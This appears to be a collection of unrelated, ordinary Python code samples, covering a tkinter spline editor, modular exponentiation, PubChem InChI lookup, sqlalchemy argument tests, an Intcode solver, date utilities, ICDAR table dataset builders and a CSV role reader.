        if self.is_simu_running:
            return
        if self.pick_ctrl_p_index < 0:
            return
        if evt.x < 0 or evt.y < 0 or evt.x > self.canvas_width or evt.y > self.canvas_height:
            return
        point = [evt.x/self.canvas_width, evt.y/self.canvas_height]
        self.simulator.spline.moveControlPoint(point, self.pick_ctrl_p_index)
        self.draw_canvas()
    def leave(self, evt):
        self.pick_ctrl_p_index = -1
    def mouseMove(self, evt):
        """Track whether the mouse hovers the curve and redraw on transitions."""
        action = (lambda: 0)
        point = [evt.x/self.canvas_width, evt.y/self.canvas_height]
        d, point, param, min_dist_curve_index = self.simulator.spline.calcDistPointToSpline(point)
        th = 0.00001
        if d < th:
            if not(self.is_mouse_on_curve):
                action = self.draw_canvas  # redraw only on the enter transition
            self.is_mouse_on_curve = True
            self.select_curve_index = min_dist_curve_index + 1
        else:
            if self.is_mouse_on_curve:
                action = self.draw_curve   # redraw only on the leave transition
            self.is_mouse_on_curve = False
        action()
    def initWidgets(self):
        """Build the canvas, elapsed-time label, buttons, and mouse bindings."""
        self.canvas = tk.Canvas(self, width=self.canvas_width, height=self.canvas_height, bd=2, bg="white")
        self.canvas.grid(column=0,row=0, rowspan=10)
        self.elapsed_time_label = tk.Label(self, text="0.000", width=10, font=("", 20))
        self.elapsed_time_label.grid(column=1, row=4)
        self.start_btn = tk.Button(self, text="スタート", bd=2, width=20, command=self.startSimulation)
        self.start_btn.grid(column=1, row=5)
        self.stop_btn = tk.Button(self, text="ストップ", bd=2, width=20, command=self.stopSimulation)
        self.stop_btn.grid(column=1, row=6)
        self.clear_ctrlps_btn = tk.Button(self, text="曲線クリア", bd=2, width=20, command=self.clearCtrlPs)
        self.clear_ctrlps_btn.grid(column=1, row=7)
        self.canvas.bind("<ButtonPress-1>", self.onLeftClick)
        self.canvas.bind("<ButtonPress-3>", self.onRightClick)
        self.canvas.bind("<ButtonRelease-1>", self.onRelease)
        self.canvas.bind("<B1-Motion>", self.onDragg)
        self.canvas.bind("<Motion>", self.mouseMove)
        self.canvas.bind("<Leave>", self.leave)
# Application entry point: build the window and hand control to Tk.
root = tk.Tk()
root.title("ParticleConstrainedOnCurve")
form = MainForm(root, 1200, 600)
form.mainloop()
|
nilq/baby-python
|
python
|
import sys
t = int(sys.stdin.readline())
MOD = 1000000007
def expo(a, b, mod=1000000007):
    """Return (a ** b) % mod by binary (square-and-multiply) exponentiation.

    mod defaults to 1e9+7 (the module-level MOD), so existing expo(a, b)
    callers are unchanged.  BUG FIX: the halving step was `b = b/2`, which is
    floor division only under Python 2; under Python 3 it produces a float and
    `b & 1` then raises TypeError.  `//=` is correct in both.
    """
    result = 1
    while b:
        if b & 1:
            result = (result * a) % mod
        a = (a * a) % mod
        b //= 2
    return result
# Driver loop (Python 2 — note the print statement below): for each of the
# t test cases read "a b" from stdin and print (a ** b) mod 1e9+7.
while(t>0):
    s = sys.stdin.readline().split(' ')
    a = int(s[0])
    b = int(s[1])
    a %= MOD  # reduce the base first so the multiplications stay small
    print expo(a,b)
    t-=1
|
nilq/baby-python
|
python
|
from __future__ import print_function
__author__ = 'Leanne Whitmore'
__email__ = 'lwhitmo@sandia.gov'
__description__ = 'Gets InChis for compounds in database'
import re
import httplib
import urllib2
import pubchempy as pcp
class CompoundTranslator(object):
    """ Converts compound IDs to their InChi"""
    # NOTE: Python 2 module (httplib/urllib2 imports above).
    def translate(self, compound_name):
        '''
        Retrieve InChi\'s for compounds.

        Normalizes the database-style name (strips a trailing _X0 suffix,
        turns underscores into spaces), then queries PubChem with fallback
        spellings: spaces->dashes, then a trailing '+', then a trailing '-'.
        Returns (inchi, iupac_name, cas_number) on success or
        (None, None, 'None') when PubChem has no match.
        '''
        cas_value = 'None'
        # strip a trailing compartment-style suffix like "_c0"
        compound_name = re.sub('\_\w{1}0$', '', compound_name)
        compound_name = re.sub('_', ' ', compound_name)
        self.get_inchi(compound_name)
        if len(self.IDs) == 0:
            compound_name = re.sub(' ', '-', compound_name)
            self.get_inchi(compound_name)
        if len(self.IDs) == 0:
            compound_name = compound_name+'+'
            self.get_inchi(compound_name)
        if len(self.IDs) == 0:
            compound_name = compound_name+'-'
            self.get_inchi(compound_name)
        if len(self.IDs) > 0:
            # Pull the CAS registry number out of the synonym list, if any;
            # the last CAS-prefixed synonym wins.
            allsynomyms = self.IDs[0].synonyms
            for syn in allsynomyms:
                if syn.startswith('CAS'):
                    cas_value = re.sub('CAS-', '', syn)
            return(self.IDs[0].inchi, self.IDs[0].iupac_name, cas_value)
        else:
            return(None, None, cas_value)
    def get_inchi(self, compound_name):
        '''Attempt to get inchi for a compound; stores matches in self.IDs.'''
        try:
            self.IDs = pcp.get_compounds(compound_name, 'name')
        except (pcp.PubChemHTTPError, httplib.BadStatusLine, urllib2.URLError, ValueError):
            # Network/HTTP failures degrade to "no match" with a warning.
            self.IDs = []
            print ('WARNING: could not get info for {}...Errored out'.format(compound_name))
|
nilq/baby-python
|
python
|
from unittest import TestCase
from lib.query_executor.connection_string.sqlalchemy import (
_get_sqlalchemy_create_engine_kwargs,
)
class CreateEngineKwargsTestCase(TestCase):
    """Tests for _get_sqlalchemy_create_engine_kwargs.

    The helper turns a connection-config dict into a
    (connection_string, connect_args) pair for sqlalchemy.create_engine.
    """
    def test_empty(self):
        # Missing/empty config and empty connect_args all yield an empty dict.
        self.assertEqual(_get_sqlalchemy_create_engine_kwargs({}), ("", {}))
        self.assertEqual(
            _get_sqlalchemy_create_engine_kwargs({"connection_string": "foobar"}),
            ("foobar", {}),
        )
        self.assertEqual(
            _get_sqlalchemy_create_engine_kwargs(
                {"connection_string": "foobar", "connect_args": []}
            ),
            ("foobar", {}),
        )
    def test_simple_connect_args(self):
        # Non-JSON values pass through as strings; later duplicates win.
        self.assertEqual(
            _get_sqlalchemy_create_engine_kwargs(
                {
                    "connection_string": "foobar",
                    "connect_args": [
                        {"key": "foo", "value": "bar", "isJson": False},
                        {"key": "hello", "value": "world"},
                    ],
                }
            ),
            ("foobar", {"foo": "bar", "hello": "world"}),
        )
        self.assertEqual(
            _get_sqlalchemy_create_engine_kwargs(
                {
                    "connection_string": "foobar",
                    "connect_args": [
                        {"key": "foo", "value": "bar", "isJson": False},
                        {"key": "foo", "value": "baz", "isJson": False},
                    ],
                }
            ),
            ("foobar", {"foo": "baz"}),
        )
    def test_json_connect_args(self):
        # isJson values are parsed: strings, numbers, lists, and objects.
        self.assertEqual(
            _get_sqlalchemy_create_engine_kwargs(
                {
                    "connection_string": "foobar",
                    "connect_args": [
                        {"key": "hello", "value": '"world"', "isJson": True},
                        {"key": "foo", "value": "1", "isJson": True},
                        {"key": "bar", "value": '["test"]', "isJson": True},
                        {"key": "baz", "value": '{"a": "b"}', "isJson": True},
                    ],
                }
            ),
            (
                "foobar",
                {"hello": "world", "foo": 1, "bar": ["test"], "baz": {"a": "b"}},
            ),
        )
    def test_error_conect_args(self):
        # Malformed entries (missing key/value, invalid JSON) are skipped;
        # valid entries still make it through.
        # NOTE(review): method name has a typo ("conect") — left as-is so
        # test discovery/history is unaffected.
        self.assertEqual(
            _get_sqlalchemy_create_engine_kwargs(
                {
                    "connection_string": "foobar",
                    "connect_args": [
                        # Value Missing
                        {"key": "foo", "isJson": True},
                        # Key Missing
                        {"value": "['test']", "isJson": True},
                        # Invalid JSON
                        {"key": "baz", "value": "{'a': 'b'}", "isJson": True},
                        # Still Works
                        {"key": "hello", "value": '"world"', "isJson": True},
                    ],
                }
            ),
            ("foobar", {"hello": "world"}),
        )
|
nilq/baby-python
|
python
|
def main():
    """Read the comma-separated Intcode program from input.txt and run both parts."""
    with open('input.txt', 'r') as source:
        program = [int(token) for token in source.read().split(',')]
    # Part 1 mutates its program, so hand it a copy.
    part1_run(program.copy())
    part2_brute_force(program)
def part1_run(program: list):
    """Part 1: run the program with noun=12, verb=2 and report position 0."""
    program[1], program[2] = 12, 2
    run_program(program)
    print(f"position 0: {program[0]}")
def part2_brute_force(program: list):
    """Part 2: search every (noun, verb) pair for output 19690720.

    Each attempt runs on a copy, so `program` itself is never mutated.
    Prints the winning pair and the 100*noun+verb answer, or a failure
    message if no pair works.
    """
    for verb in range(len(program)):
        for noun in range(len(program)):
            n_prog = program.copy()
            n_prog[1] = noun
            n_prog[2] = verb
            try:
                run_program(n_prog)
            except Exception:
                # Invalid opcode / out-of-range address for this pair: skip.
                # BUG FIX: was a bare `except:`, which also swallowed
                # KeyboardInterrupt and SystemExit.
                continue
            if n_prog[0] == 19690720:
                print(f"noun: {noun}, verb: {verb}")
                print(f"answer: {100 * noun + verb}")
                return
    print("part 2 brute force completed without answer")
def run_program(program: list):
    """Execute the Intcode `program` in place until opcode 99 halts it.

    run_op signals the halt by raising StopIteration; running off the end of
    the program without ever halting is treated as a fatal bug.
    """
    pc = 0
    try:
        while pc < len(program):
            pc = run_op(program, pc)
    except StopIteration:
        return
    assert False
def run_op(program: list, position: int) -> int:
    """Execute one instruction at *position*; return the next pointer.

    Opcode 1 adds, opcode 2 multiplies (both use positional operands and
    store into a positional destination); opcode 99 halts by raising
    StopIteration.  Any other opcode is a malformed program.
    """
    opcode = program[position]
    assert opcode in (1, 2, 99, )
    if opcode == 99:
        raise StopIteration()
    lhs = program[program[position + 1]]
    rhs = program[program[position + 2]]
    target = program[position + 3]
    program[target] = lhs + rhs if opcode == 1 else lhs * rhs
    return position + 4
# Script entry point.
if __name__ == '__main__':
    main()
|
nilq/baby-python
|
python
|
""" Date time stuff """
import calendar
import datetime
import re

import requests
from ics import Calendar

import config
_FIRST_MONTH = 1
_MAX_MONTH = 12
_MONTHS = [
"January",
"February",
"March",
"April",
"June",
"July",
"August",
"September",
"October",
"November",
"December"]
_TURKISH_DATE_LEN = 10
_TURKISH_DATE_REGEX = "[0-3][0-9].[0-1][0-9].[1-2][0-9][0-9][0-9]"
_BANK_HOLIDAY_CALENDAR = None
def equals(date1: datetime.datetime, date2: datetime.datetime):
    """ True when both timestamps fall on the same calendar day """
    return (date1.year, date1.month, date1.day) == \
           (date2.year, date2.month, date2.day)
def get_first_day_of_month(date: datetime.datetime):
    """ Midnight on the first day of *date*'s month """
    return datetime.datetime(date.year, date.month, 1)
def get_first_day_of_next_month(date: datetime.datetime):
    """ Midnight on the first day of the month after *date*'s month """
    if date.month == 12:
        return datetime.datetime(year=date.year + 1, month=1, day=1)
    return datetime.datetime(year=date.year, month=date.month + 1, day=1)
def get_formatted_date(date: datetime.datetime) -> str:
    """ Date formatted as YYYY-MM-DD """
    return date.strftime("%Y-%m-%d")
def get_last_day_of_prev_month(date: datetime.datetime) -> datetime:
    """ Last day of the month preceding *date*'s month """
    prev = get_previous_month(date)
    last_day = _get_last_day_of_month(prev.month, prev.year)
    return datetime.datetime(year=prev.year, month=prev.month, day=last_day)
def get_last_day_of_month(date: datetime.datetime) -> datetime:
    """ Last day of *date*'s month """
    last_day = _get_last_day_of_month(date.month, date.year)
    return datetime.datetime(year=date.year, month=date.month, day=last_day)
def get_mid_day_of_month(date: datetime.datetime):
    """ The 15th of *date*'s month """
    return datetime.datetime(date.year, date.month, 15)
def get_mid_day_of_next_month(date: datetime.datetime):
    """ The 15th of the month after *date*'s month """
    following = get_next_month(date)
    return datetime.datetime(year=following.year, month=following.month, day=15)
def get_mid_day_of_next_year(date: datetime.datetime):
    """ June 15th of the year after *date*'s year """
    mid_year = get_mid_day_of_year(date)
    return get_next_year(mid_year)
def get_mid_day_of_year(date: datetime.datetime):
    """ June 15th of *date*'s year """
    return datetime.datetime(date.year, 6, 15)
def get_month_name(month: int) -> str:
    """ English name of the given 1-based month (1=January ... 12=December).

    Uses calendar.month_name, which is 1-based and always contains all
    twelve months; the previous hand-rolled _MONTHS lookup was missing
    "May" and indexed a 1-based month into a 0-based list.
    """
    return calendar.month_name[month]
def get_months_between_dates(low: datetime.datetime, high: datetime.datetime) -> int:
    """ Number of whole calendar months from *low* to *high* """
    year_gap = high.year - low.year
    month_gap = high.month - low.month
    return year_gap * 12 + month_gap
def get_next_day(date: datetime.datetime, next_count=1):
    """ *next_count* days after *date* (negative counts step backwards) """
    delta = datetime.timedelta(days=next_count)
    return date + delta
def get_next_month(date: datetime, next_count=1):
    """ Same day *next_count* months ahead (day clamped to month length).

    Uses modular month arithmetic, so negative *next_count* values now
    step backwards correctly; the previous while-loop only normalised
    overflow above December and raised ValueError for months <= 0.
    """
    total_months = (date.month - 1) + next_count
    next_year = date.year + total_months // _MAX_MONTH
    next_month = total_months % _MAX_MONTH + 1
    # Clamp e.g. Jan 31 -> Feb 28/29.
    day = _shift_day_to_month(date.day, next_month, next_year)
    return datetime.datetime(year=next_year, month=next_month, day=day)
def get_next_week(date: datetime.datetime, next_count=1):
    """ *next_count* weeks after *date* """
    delta = datetime.timedelta(weeks=next_count)
    return date + delta
def get_nearest_workday(date: datetime.datetime, backwards=False):
    """ Closest working day, stepping forwards (default) or backwards """
    step = -1 if backwards else 1
    candidate = date
    # Saturday (5), Sunday (6) and bank holidays are skipped.
    while candidate.weekday() >= 5 or is_bank_holiday(candidate):
        candidate = get_next_day(candidate, next_count=step)
    return candidate
def get_next_year(date: datetime, next_count=1):
    """ Same calendar day *next_count* years ahead.

    Clamps Feb 29 to Feb 28 on non-leap target years; the previous
    implementation raised ValueError for that input.
    """
    target_year = date.year + next_count
    day = min(date.day, calendar.monthrange(target_year, date.month)[1])
    return datetime.datetime(target_year, date.month, day)
def get_previous_month(date: datetime.datetime) -> datetime.datetime:
    """ Same day one month earlier (day clamped to month length) """
    if date.month == 1:
        year, month = date.year - 1, 12
    else:
        year, month = date.year, date.month - 1
    # Clamp e.g. Mar 31 -> Feb 28/29.
    day = _shift_day_to_month(date.day, month, year)
    return datetime.datetime(year=year, month=month, day=day)
def get_turkish_date_at_start(line: str) -> datetime.datetime:
    """ Parse a Turkish (dd.mm.yyyy) date from the first field of *line*.

    The line is expected to be semicolon separated.  Day and month are
    zero-padded before validation.  Returns None when no valid date can
    be extracted.
    """
    fields = line.split(";")
    if len(fields) < 2:
        return None
    pieces = fields[0].split(".")
    if len(pieces) < 3:
        return None
    day_part = str(pieces[0]).zfill(2)
    month_part = str(pieces[1]).zfill(2)
    year_part = str(pieces[2])
    candidate = day_part + "." + month_part + "." + year_part
    if not is_turkish_date(candidate):
        return None
    return parse_turkish_date(candidate)
def get_two_digit_month(month: int) -> str:
    """ Month number zero-padded to at least two digits """
    return str(month).zfill(2)
def is_bank_holiday(date: datetime.datetime) -> bool:
    """ Is *date* inside a bank holiday event.

    Downloads the bank holiday ICS calendar on first use and caches it in
    the module-level _BANK_HOLIDAY_CALENDAR global for subsequent calls.
    """
    global _BANK_HOLIDAY_CALENDAR
    if _BANK_HOLIDAY_CALENDAR is None:
        # Network call; happens at most once per process.
        _BANK_HOLIDAY_CALENDAR = Calendar(requests.get(config.CONSTANTS["BANK_HOLIDAY_URL"]).text)
    for holiday_event in _BANK_HOLIDAY_CALENDAR.events:
        # Compare on whole days; event begin/end clock times are discarded.
        holiday_begin = datetime.datetime(year=holiday_event.begin.datetime.year,
                                          month=holiday_event.begin.datetime.month,
                                          day=holiday_event.begin.datetime.day)
        holiday_end = datetime.datetime(year=holiday_event.end.datetime.year,
                                        month=holiday_event.end.datetime.month,
                                        day=holiday_event.end.datetime.day)
        # End is treated as exclusive — presumably matching the ICS feed's
        # convention; TODO confirm against the actual calendar data.
        if date >= holiday_begin and date < holiday_end:  # pylint: disable=R1716
            return True
    return False
def is_today(date: datetime.datetime) -> bool:
    """ Does *date* fall on the current calendar day """
    now = datetime.datetime.now()
    return equals(date, now)
def is_turkish_date(date: str) -> bool:
    """ Does *date* look like a Turkish dd.mm.yyyy date """
    return re.match(_TURKISH_DATE_REGEX, date) is not None
def is_working_day(date: datetime.datetime) -> bool:
    """ True when *date* is neither a weekend day nor a bank holiday """
    # Saturday == 5, Sunday == 6; bank holiday check may hit the network
    # on first use (see is_bank_holiday).
    return date.weekday() not in (5, 6) and not is_bank_holiday(date)
def parse_json_date(json_date: str) -> datetime.datetime:
    """ Parse a JSON timestamp, trying the known formats in order.

    Falls through from the most to the least specific format; the final
    date-only attempt is allowed to raise so callers see a parse failure.
    """
    known_formats = (
        '%Y-%m-%dT%H:%M:%S.%f',
        '%Y-%m-%dT%H:%M:%S.%fZ',
        '%Y-%m-%d %H:%M:%S.%f',
        '%Y-%m-%dT%H:%M:%S',
        '%Y-%m-%d %H:%M:%S',
    )
    for fmt in known_formats:
        try:
            return datetime.datetime.strptime(json_date, fmt)
        except Exception:
            continue
    return datetime.datetime.strptime(json_date, '%Y-%m-%d')
def parse_sap_date(date: str) -> datetime.datetime:
    """ Parse a date in SAP format (YYYYMMDD) """
    return datetime.datetime(year=int(date[:4]),
                             month=int(date[4:6]),
                             day=int(date[6:8]))
def parse_turkish_date(date: str) -> datetime.datetime:
    """ Parse a date in Turkish format (dd.mm.yyyy) """
    parts = date.split(".")
    return datetime.datetime(year=int(parts[2]),
                             month=int(parts[1]),
                             day=int(parts[0]))
def _month_has_30_days(month: int) -> bool:
return month in (4, 6, 9, 11)
def _get_last_day_of_month(month: int, year: int) -> int:
if month == 2 and year % 4 == 0:
return 29
if month == 2:
return 28
if _month_has_30_days(month):
return 30
return 31
def _shift_day_to_month(day: int, month: int, year: int) -> int:
    # Clamp *day* so it is a valid day number within the given month.
    return min(day, _get_last_day_of_month(month, year))
|
nilq/baby-python
|
python
|
from .drm import DRM
from .aes_drm import AESDRM
from .playready_drm_additional_information import PlayReadyDRMAdditionalInformation
from .clearkey_drm import ClearKeyDRM
from .fairplay_drm import FairPlayDRM
from .marlin_drm import MarlinDRM
from .playready_drm import PlayReadyDRM
from .primetime_drm import PrimeTimeDRM
from .widevine_drm import WidevineDRM
from .drm_status import DRMStatus
from .cenc_drm import CENCDRM
from .cenc_playready_entry import CENCPlayReadyEntry
from .cenc_widevine_entry import CENCWidevineEntry
from .cenc_marlin_entry import CENCMarlinEntry
from .cenc_fairplay_entry import CENCFairPlayEntry
|
nilq/baby-python
|
python
|
"""ICDAR 2013 table recognition dataset."""
from abc import abstractmethod
import xml.etree.ElementTree as ET
import io
import os
import glob
import pathlib
from itertools import chain
import tensorflow_datasets as tfds
import tensorflow as tf
import pdf2image
import PIL
from table.markup_table import Cell, Table
from utils.rect import Rect
from table.grid_structure import GridStructureBuilder
import split.evaluation
# TODO(ICDAR): Markdown description that will appear on the catalog page.
_DESCRIPTION = """
Description is **formatted** as markdown.
It should also contain any processing which has been applied (if any),
(e.g. corrupted example skipped, images cropped,...):
"""
# TODO(ICDAR): BibTeX citation
_CITATION = """
"""
# Ground-truth files with known defects, keyed as [dataset folder, file stem];
# these are skipped during example generation.
_FILES_TO_IGNORE = [
    ['competition-dataset-eu', 'eu-015'],  # cells lie outside page rect
    ['competition-dataset-us', 'us-035a'],  # 2nd table has invalid cell coords
    ['eu-dataset', 'eu-032'],  # 2nd table has invalid cell coords
    ['eu-dataset', 'eu-014'],  # invalid cell text rect
    ['eu-dataset', 'eu-023'],  # invalid cell text rect
    ['us-gov-dataset', 'us-025'],  # invalid cell text rect
    ['us-gov-dataset', 'us-012'],  # invalid cell text rect
    ['us-gov-dataset', 'us-020'],  # invalid cell text rect
]
class IcdarBase(tfds.core.GeneratorBasedBuilder):
    """Base DatasetBuilder for ICDAR datasets.

    Downloads the ICDAR 2013 table recognition PDFs with their region and
    structure ground-truth XML, renders each PDF page, crops out every
    table and yields one example per table.  Subclasses define the feature
    dict and how a single (table image, markup table) pair is encoded.
    """

    def _info(self) -> tfds.core.DatasetInfo:
        """Returns the dataset metadata."""
        return tfds.core.DatasetInfo(
            builder=self,
            description=_DESCRIPTION,
            features=self._get_features_dict(),
            homepage='https://www.tamirhassan.com/html/dataset.html',
            citation=_CITATION,
            disable_shuffling=True
        )

    @abstractmethod
    def _get_features_dict(self) -> tfds.features.FeaturesDict:
        """Returns features, describing dataset element."""
        pass

    def _split_generators(self, dl_manager: tfds.download.DownloadManager):
        """Returns SplitGenerators.

        Train = EU + US-gov datasets chained together; test = the
        competition dataset.
        """
        pathes = dl_manager.download_and_extract(
            ['https://www.tamirhassan.com/html/files/eu-dataset-20130324.zip',
             'https://www.tamirhassan.com/html/files/us-gov-dataset-20130324.zip',
             'https://www.tamirhassan.com/html/files/icdar2013-competition-dataset-with-gt.zip'])
        if not isinstance(pathes, list):
            # During unit-testing dl_manager will return path to dummy_data.
            return {'train': self._generate_examples(pathes)}
        return {
            'train': chain(
                self._generate_examples(pathes[0]),
                self._generate_examples(pathes[1])),
            'test': self._generate_examples(pathes[2])
        }

    def _generate_examples(self, path):
        """Yields examples: one per table found in each non-ignored PDF."""
        for pdf_file_path in glob.glob(os.path.join(path, '**/*.pdf'), recursive=True):
            pdf_file_path = pathlib.Path(pdf_file_path)
            parent_folder_name = pdf_file_path.parts[-2]
            stem = pdf_file_path.stem
            if [parent_folder_name, stem] in _FILES_TO_IGNORE:
                continue
            # Ground truth lives next to the PDF: <stem>-reg.xml / <stem>-str.xml.
            region_file_path = pdf_file_path.with_name(stem + '-reg.xml')
            structure_file_path = pdf_file_path.with_name(stem + '-str.xml')
            # dpi=72 keeps rendered pixels aligned with the PDF point
            # coordinates used in the ground-truth XML.
            pages = pdf2image.convert_from_path(pdf_file_path, dpi=72)
            for page_number, table in self._generate_tables(pages, region_file_path, structure_file_path):
                key = '{}-{}-{}'.format(parent_folder_name, stem, table.id)
                page = pages[page_number]
                table_image = page.crop(table.rect.as_tuple())
                yield key, self._get_single_example_dict(table_image, table)

    @abstractmethod
    def _get_single_example_dict(self, table_image, markup_table):
        """Returns dict with nessary inputs for the model."""
        pass

    def _generate_tables(self, pages, region_file_path, structure_file_path):
        """Yields (page_number, Table) pairs from paired region/structure XML."""
        regions_tree = ET.parse(region_file_path)
        structures_tree = ET.parse(structure_file_path)
        # Region and structure files list the same tables in the same order.
        for table_node, table_structure_node in zip(regions_tree.getroot(), structures_tree.getroot()):
            table_id = int(table_node.get('id'))
            region_node = table_node.find('region')
            # XML pages are 1-based; pdf2image pages are 0-based.
            page_number = int(region_node.get('page')) - 1
            page_width, page_height = pages[page_number].size
            table_rect = self._get_bounding_box(page_width, page_height, region_node)
            cells_node = table_structure_node.find('region')
            cells = [self._get_cell(page_width, page_height, node) for node in cells_node]
            yield page_number, Table(table_id, table_rect, cells)

    def _get_bounding_box(self, page_width, page_height, xml_node):
        """Reads a bounding-box node, flipping y from PDF (bottom-left origin)
        to image (top-left origin) coordinates."""
        bounding_box_node = xml_node.find('bounding-box')
        left = self._to_int(bounding_box_node.get('x1'))
        top = page_height - self._to_int(bounding_box_node.get('y2'))
        right = self._to_int(bounding_box_node.get('x2'))
        bottom = page_height - self._to_int(bounding_box_node.get('y1'))
        assert 0 <= left and left < right and right <= page_width
        assert 0 <= top and top < bottom and bottom <= page_height
        return Rect(left, top, right, bottom)

    def _to_int(self, str):
        # 'ß' appears in place of a digit in some ground-truth files —
        # presumably an encoding/OCR artifact meaning '6'; TODO confirm.
        result = str.replace('ß', '6')
        return int(result)

    def _get_cell(self, page_width, page_height, xml_node):
        """Builds a Cell from a cell XML node (text rect + grid span)."""
        text_rect = self._get_bounding_box(page_width, page_height, xml_node)
        col_start = int(xml_node.get('start-col'))
        # end-col/end-row default to the start when absent (1x1 cell).
        col_end = int(xml_node.get('end-col', col_start))
        row_start = int(xml_node.get('start-row'))
        row_end = int(xml_node.get('end-row', row_start))
        assert col_start <= col_end and row_start <= row_end
        # Grid rect is half-open, hence the +1 on both ends.
        grid_rect = Rect(col_start, row_start, col_end + 1, row_end + 1)
        return Cell(text_rect, grid_rect)

    def _image_to_byte_array(self, image):
        """PNG-encodes a PIL image into raw bytes."""
        imgByteArr = io.BytesIO()
        image.save(imgByteArr, format='png')
        imgByteArr = imgByteArr.getvalue()
        return imgByteArr
class IcdarSplit(IcdarBase):
    """DatasetBuilder for training SPLIT model.

    Each example carries the cropped table image plus boolean row/column
    split-point masks derived from the ground-truth markup table.
    """
    VERSION = tfds.core.Version('1.0.1')
    RELEASE_NOTES = {
        '1.0.0': 'Initial release.',
        '1.0.1': 'Generate markup table.'
    }

    def _get_features_dict(self):
        """Feature spec: image, split-point masks and serialized ground truth."""
        return tfds.features.FeaturesDict({
            'image': tfds.features.Image(shape=(None, None, 3)),
            'horz_split_points_mask': tfds.features.Tensor(shape=(None,), dtype=tf.bool),
            'vert_split_points_mask': tfds.features.Tensor(shape=(None,), dtype=tf.bool),
            # Ground truth table
            'markup_table': tfds.features.Tensor(shape=(), dtype=tf.string)
        })

    def _get_single_example_dict(self, table_image, markup_table):
        """Returns dict with nessary inputs for the model."""
        horz_split_points_mask = markup_table.create_horz_split_points_mask()
        vert_split_points_mask = markup_table.create_vert_split_points_mask()
        return {
            'image': self._image_to_byte_array(table_image),
            'horz_split_points_mask': horz_split_points_mask,
            'vert_split_points_mask': vert_split_points_mask,
            'markup_table': markup_table.to_tensor().numpy()
        }
class IcdarMerge(IcdarBase):
    """DatasetBuilder for training MERGE model.

    Runs a pre-trained SPLIT model over each table image and stores its
    outputs alongside ground-truth merge masks, so the MERGE model can be
    trained without re-running SPLIT.
    """
    VERSION = tfds.core.Version('1.0.1')
    RELEASE_NOTES = {
        '1.0.0': 'Initial release.',
        '1.0.1': 'Generate markup table.'
    }

    def __init__(self, split_checkpoint_path='checkpoints/split_icdar.ckpt', **kwargs):
        super().__init__(**kwargs)
        # Checkpoint of the SPLIT model whose outputs become inputs here.
        self._split_checkpoint_path = split_checkpoint_path
        # Lazy initialization
        self._split_model = None

    def _get_features_dict(self):
        """Feature spec: image, SPLIT outputs, merge masks and ground truth."""
        return tfds.features.FeaturesDict({
            'image': tfds.features.Image(shape=(None, None, 3)),
            # SPLIT model outputs
            'horz_split_points_probs': tfds.features.Tensor(shape=(None,), dtype=tf.float32),
            'vert_split_points_probs': tfds.features.Tensor(shape=(None,), dtype=tf.float32),
            'horz_split_points_binary': tfds.features.Tensor(shape=(None,), dtype=tf.int32),
            'vert_split_points_binary': tfds.features.Tensor(shape=(None,), dtype=tf.int32),
            # Ground truth masks
            'merge_right_mask': tfds.features.Tensor(shape=(None, None), dtype=tf.bool, encoding='zlib'),
            'merge_down_mask': tfds.features.Tensor(shape=(None, None), dtype=tf.bool, encoding='zlib'),
            # Ground truth table
            'markup_table': tfds.features.Tensor(shape=(), dtype=tf.string)
        })

    def _get_single_example_dict(self, table_image, markup_table):
        """Returns dict with nessary inputs for the model."""
        h_probs, v_probs, h_binary, v_binary = self._get_split_model_outputs(table_image)
        # Grid cells come from the SPLIT predictions; merge masks from ground truth.
        grid = GridStructureBuilder(markup_table.rect, h_binary, v_binary).build()
        merge_right_mask, merge_down_mask = markup_table.create_merge_masks(grid)
        return {
            'image': self._image_to_byte_array(table_image),
            'horz_split_points_probs': h_probs,
            'vert_split_points_probs': v_probs,
            'horz_split_points_binary': h_binary,
            'vert_split_points_binary': v_binary,
            'merge_right_mask': merge_right_mask,
            'merge_down_mask': merge_down_mask,
            'markup_table': markup_table.to_tensor().numpy()
        }

    def _get_split_model_outputs(self, table_image):
        """Runs the SPLIT model on one table image; returns numpy outputs."""
        table_image_array = tf.keras.utils.img_to_array(
            table_image, data_format='channels_last', dtype='uint8')
        table_image_tensor = tf.convert_to_tensor(table_image_array, dtype='uint8')
        # Model expects a leading batch dimension.
        table_image_tensor = tf.expand_dims(table_image_tensor, axis=0)
        outputs_dict = self._get_split_model()(table_image_tensor)
        keys_of_interest = [
            'horz_split_points_probs3',
            'vert_split_points_probs3',
            'horz_split_points_binary',
            'vert_split_points_binary'
        ]
        return tuple(
            tf.squeeze(outputs_dict[key], axis=0).numpy() for key in keys_of_interest
        )

    def _get_split_model(self):
        """Loads the SPLIT model from checkpoint on first use, then caches it."""
        if self._split_model is not None:
            return self._split_model
        assert tf.io.gfile.exists(self._split_checkpoint_path)
        model = split.evaluation.load_model(self._split_checkpoint_path, False)
        self._split_model = model
        return model
|
nilq/baby-python
|
python
|
import re
import csv
from collections import defaultdict
from csv import DictReader
###########################################################
## TEST
def print_sammler(filename):
    """Print role name and global id for every row of the CSV *filename*."""
    with open(filename) as csvfile:
        for row in csv.DictReader(csvfile):
            print(row['errolename'], row['erglobalid'], "\n")
def print_people(filename):
    """Print uid and common name for every row of the CSV *filename*."""
    with open(filename) as csvfile:
        for row in csv.DictReader(csvfile):
            print(row['uid'], row['cn'])
def read_people(filename):
    """Load people from the CSV *filename*, keyed by uid.

    Each value is a dict with the person's UID, NAME (cn column) and the
    raw ROLES string (erroles column).
    """
    people = {}
    with open(filename) as csvfile:
        for row in csv.DictReader(csvfile):
            people[row['uid']] = {
                'UID': row['uid'],
                'NAME': row['cn'],
                'ROLES': row['erroles'],
            }
    return people
def read_roles(filename):
    """Load roles from the CSV *filename*, keyed by erglobalid."""
    roles = {}
    with open(filename) as csvfile:
        for row in csv.DictReader(csvfile):
            roles[row['erglobalid']] = {'NAME': row['errolename']}
    return roles
def print_roles(person, rolecache):
    """Print every role of *person* that is present in *rolecache*.

    The ROLES field is a '|'-separated list of LDAP-style DNs; the role id
    is the value of the leading ``erglobalid=`` component.  Role ids not
    present in *rolecache* are silently skipped (the exports may be out of
    sync).
    """
    for entry in person['ROLES'].split('|'):
        # print (i[11:38])
        res = re.search("^erglobalid=(.*),(.*)$", entry[:38])
        roleId = res.group(1)
        # A plain membership test replaces the old `while True` /
        # `try` / bare-`except` construct, which swallowed every
        # exception just to skip unknown role ids.
        if roleId in rolecache:
            sammler = rolecache[roleId]
            print(" RoleID: ", roleId, " - ", sammler['NAME'])
def print_all(personcache, rolecache):
    """Print every person with their resolvable roles.

    Returns a dict keyed by role id with ROLEID/NAME entries for every
    role that was found in *rolecache*.  Role ids missing from the cache
    are silently skipped (the exports may be out of sync).
    """
